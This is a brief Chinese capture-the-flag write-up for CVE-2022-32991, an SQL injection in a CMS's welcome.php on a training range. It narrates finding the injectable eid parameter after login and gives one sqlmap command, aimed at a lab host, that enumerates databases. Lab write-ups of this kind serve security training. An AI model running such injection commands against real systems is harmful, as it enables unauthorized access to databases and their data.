[春秋云境] CVE-2022-32991

CVE-2022-32991

靶标介绍

该CMS的welcome.php中存在SQL注入攻击。

解题过程

进入主界面,没有明显可以注入的地方,先注册登录。

登录之后的界面
此处有个?q=1但是多次测试后,感觉不是注入点。
点击这个按钮,进入新的界面。
多次测试发现注入点

sqlmap梭哈

复制代码
sqlmap -u "http://eci-2zeb8alt7sk432zz6n7j.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e*&n=1&t=10" --dbs

sqlmap指定参数进行注入

相关推荐
后台模板学习9 小时前
Rust vs Python 在用户认证模块中的实现:底层
开发语言·python·rust
AIGC大时代9 小时前
LangGraph 生产级笔记:Checkpointer + interrupt(),把人审做成可恢复状态机
python·agent·状态机·langgraph·hitl
凤城老人9 小时前
基于 Flask 的企业级 CMS 架构设计与实现
后端·python·flask
所念皆星海9119 小时前
Python学习---DAY10函数
开发语言·python·学习
刘天远9 小时前
企业 Agent 需求怎么写:数据结构、流程图与 Python 校验
数据结构·人工智能·python·流程图
Java后端的Ai之路9 小时前
23、Python - 策略模式
linux·python·策略模式
旖旎夜光9 小时前
【LangChain实战】LangChain 学习笔记(一):从定义大模型到工具调用
人工智能·笔记·python·学习·langchain
临沂GEO9 小时前
用好地域流量,提升内容自然搜索曝光
网络·python
问天_观心18 小时前
大模型微调学习(二)
人工智能·python·深度学习·学习·语言模型·transformer
洋洋不叫杨杨18 小时前
揭秘当下知名的SEO优化渠道,你知道几个?
大数据·python